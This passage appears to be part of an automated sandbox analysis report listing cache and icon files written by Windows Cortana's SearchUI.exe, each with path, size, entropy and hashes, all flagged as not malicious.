                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\22vbw3mGZSKEYr35n4QdID4G9j8[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\41Ctwd2X9VNGNHVpdti2vTFozWw.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):3280
                                                            Entropy (8bit):5.029628776196898
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:65237D68849782412963C9B1A1DA22E5
                                                            SHA1:3490F341E17FEAA7FB56D942539C24C5FA54A30A
                                                            SHA-256:4B950875FDE265B75753C2A8BEC4588476A323036B38B360A3EDD2A22A106B49
                                                            SHA-512:FB18BFB43AF2BC6BFFE020AF039D7BCD74B7CE1823D62026F6B5F231E51E024240E2F8B6399716DDFED2EDDECA6302B43D982256ADE02026AA0A6052C35085DF
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\E1FvzbKmaRHmOqEzJ-mHoTOD7Ms.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):45447
                                                            Entropy (8bit):4.519302585237155
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6859B06C69A93BD325D6CDB2A5CECBD4
                                                            SHA1:5F1B96C6E59054C14D1EE9A3F3A2CBBC70E03B87
                                                            SHA-256:6A232348034A0564B74D8A293AC8DC15664E26664CD4E071E1D2E740B76D9EC6
                                                            SHA-512:9166D92CBF6945282259A2CA8D53F6D5986FF81DE3D61C191D44A745B093936E21E71132833CB885A829C9BF9E4CE42618BD5E995B7A24929436615DF35E91ED
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\jhP1uapRf8Z8Qb959t11DNTsvB8.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8204
                                                            Entropy (8bit):5.24502306901906
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E9E0F2C7D9FF4E7BA872A004593454B5
                                                            SHA1:2DB69A5F85D5AFD2C523F8F6B8867EAA4E1125F9
                                                            SHA-256:24D847FBF4FD59BE3529FDFA7542FD3FE9512662927DD482E60D11344175E778
                                                            SHA-512:F01AC1FED499AAB6465F3F1FEA96B5036043C260DD8A9029046895768794503264A98E41CC306F54557EAC74C228AF9A65A1E6CBDCFE6B4E0E8BBBD730F6A6A5
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\p_H40Ndq102p2Socno0_V88cqhw[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8313
                                                            Entropy (8bit):6.052018977754187
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ABF5B9B940857FBD14B60DEA87CCB55F
                                                            SHA1:8A8AA1FF59E26E1C9E5137269630CA25DA231F3E
                                                            SHA-256:402598AD8D9469816D4AA4E7DF4957B8A01AC03BF09A9AFED279E45777B046C8
                                                            SHA-512:F3B556775EF65D0836E3B593867DA0194F0D2E67F78CFEFF99218851466A7F7E6364369194735FFDC22021175A8959B05F71F959D968897812DDB1EAB5FACE0A
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\sWWssH4VwKKxySDezvIayxUduKc[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1799310
                                                            Entropy (8bit):6.276777165076816
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:64C2295BAA2FA6AC19AA8E78FCD509EF
                                                            SHA1:9A1A6E37CB455504CF8120E20541C9680AF9097B
                                                            SHA-256:03DDA809E459F05D75A3838522A2BF4D189337E0C9103B98EC66168FE7933C74
                                                            SHA-512:B946B280F0A9C0582F0C80D69A3AFAE82E175DD87AEF29A2AEC5EEF1DA59913F745B439E7CC72CAAA449E541D67E24C48C0968C70FF6A3E8B065926804E6EF9E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):37342
                                                            Entropy (8bit):5.3267899861839485
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F44EA9D80C88FBCDA801F3A2E0D79E8D
                                                            SHA1:942DAC5E088686F2D09D048AA5F376DE366421E1
                                                            SHA-256:57DEBE6CDD1AEBDE19A85A2B95AA78FD8DCA4726F12BBB0D59931E5F21F92C85
                                                            SHA-512:2AB3D3F4551DD32F0AA7BF50660FBC28FD690C95108AA460C4C465DEF883A7D76DE1E286D3132029BECA767AE615A0DF788F91D7367CD9D0C9DA32754CB3364D
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\-cZsBti431DEnyexEqRgH_6Vh3E.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\41Ctwd2X9VNGNHVpdti2vTFozWw.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\4yU6o9nzuSe0YbPN7SClkKqmF_A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:exported SGML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):206389
                                                            Entropy (8bit):5.317441455647523
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A07762DF96F4D7C691102B03AA3A2B4F
                                                            SHA1:D1DAF359D01FD78A447BE8A5F2B2A2DD72CFD3B4
                                                            SHA-256:F622EEBC2B8049B8D3DD3DDAB085588091CFA1DC07DD56E63B220D99490E12C3
                                                            SHA-512:44B9BA5838200E49160D889528A43829EEC4DF26DAD51B5C470D217C0A0E0738F083C08B114D112A4F75A8087C1D72F9289476580580AD7E02EC4A2547076479
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\98-tFzBbrLP3oaKdmZtyZ4BBBI4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):121609
                                                            Entropy (8bit):5.370285863147917
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:129776DB6BA6BEA4AF70CDB1EA56942A
                                                            SHA1:12BFE666C0B57B134E7B8B88BCF1A0C3B5DCF3CD
                                                            SHA-256:2D55886903198E35295B8E90738DA47859837BABA26D47E15BAC87F90EE608D3
                                                            SHA-512:AEDF99A152B97BE6A57F0D1FB1DD43B0BB69508EAE65B3A054024CD9E5DD59670EBEAFF6CE7525E2B7263BBD7C963C30659628F9A2DF16410674871538DEF94B
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\T60N45BmFmN366tGF_ypDnu_BSI.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):61910
                                                            Entropy (8bit):5.212669983150976
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:511133657AF5879385B2A2F549D8728A
                                                            SHA1:9FB769E39DDC9A2F24CD80B4ECE18BFF2E1C89EE
                                                            SHA-256:CDFEAEB6D130502BCD1C97485FD247E8377F47E308E15C829BDB6B43EAC370D6
                                                            SHA-512:F487AA6610D4EA74A2DB08DDC5628D650BCFE55C1021EFF930F9FFF9E4EDE2B4B84C8528ED23A34B8371860335E916FACDAB3894A134764125299EA9D2FCC31D
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\T60N45BmFmN366tGF_ypDnu_BSI.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\XlOxpNAPazK1Ul3yuHNFQLgvMig.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):68729
                                                            Entropy (8bit):5.410874231094568
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FDB38BCD50516FE5B941C0A129871C7A
                                                            SHA1:C3EAE8B7DDCA1D1CAE603736B62C8DDC30682220
                                                            SHA-256:3F3896F727136A67F7B5A668FC950CC74DD266B48AD6DB80B43C5A0F88EAD898
                                                            SHA-512:1B16CB45494B7D946180B88FB767DF9C97D1FF93D845CF8A5E36468844D60878275FA3EFA12D73335810D77514AAF73119C5F5DB1B154E845ACB8979AA61E761
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\XlOxpNAPazK1Ul3yuHNFQLgvMig.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\ZkAG-UZl4xeENnu1psdKTgHhS2A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:modified
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\b7PYrtpXGXE_bvZ4M1MrlULeVLE.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):44752
                                                            Entropy (8bit):5.5814908250758455
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:3CD24086581E8185051876E4AC6BE8AB
                                                            SHA1:8FBD2F8D7C8B87C3433E157A8DB05CF00A303CB4
                                                            SHA-256:69923A7FE888459B43B39338F63164221DFBE1D2ECEA558BA073AED27B0E7F9D
                                                            SHA-512:73918F6F28FDFAFC070365B9C996CC157A37DF63C1EB8C59A9FC39F0DCD1C9EEFA00F4873FCA626785FEFA33E86D235ED1D066230B30785011A42BEFD35A3535
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\b7PYrtpXGXE_bvZ4M1MrlULeVLE.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\p_H40Ndq102p2Socno0_V88cqhw[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\sWWssH4VwKKxySDezvIayxUduKc[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\zEQqhwKoETyGdQapOnP2uL1FFF0.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):202174
                                                            Entropy (8bit):4.353086485551748
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:30F68A3EA9F8FE63101E59CED32FA3E7
                                                            SHA1:0450964533A5363F20FD7A7AE16821CDFC1FCC1D
                                                            SHA-256:90FCCF6342D5BCFDE3F69F88B80253EC694B9B901CC55FD84A2E0C6E0FF05CAF
                                                            SHA-512:F994377757539611FE2781B6AEEDCFE2B2C7073516C0F3887C0FD836E1ED69066DAABE7065DAE1FC4AA071F8F5080939591B3EBD4642B1EAA42C7B25C2003349
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\zEQqhwKoETyGdQapOnP2uL1FFF0.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\03FMIZBH\www.bing[1].xml
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\0NFY1WC2\www.bing[1].xml
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):109
                                                            Entropy (8bit):4.716834990888681
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5A81046E367565C15AC4F61BE230EC00
                                                            SHA1:3BB183F538785610BBF5E52C825C1F329CD63EDB
                                                            SHA-256:7D729EDB4FC77B91434B314495B30A26221ADA539492AA0EFE0928DFBC12C6CB
                                                            SHA-512:CED2D279AF8D339B7D850CA763C3F36AEC663337E8491E774EC2ADA6D858B4305DFAAC73DAB5AB4B5D4D34CE8DEC05B2A2071A934A99070D153FF792EA88EF72
                                                            Malicious:false
                                                            Preview: <root></root><root><item name="eventLogQueue_Online" value="[]" ltime="1721138960" htime="30873365" /></root>
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_BingWeather_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_GetHelp_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Getstarted_8wekyb3d8bbwe!App
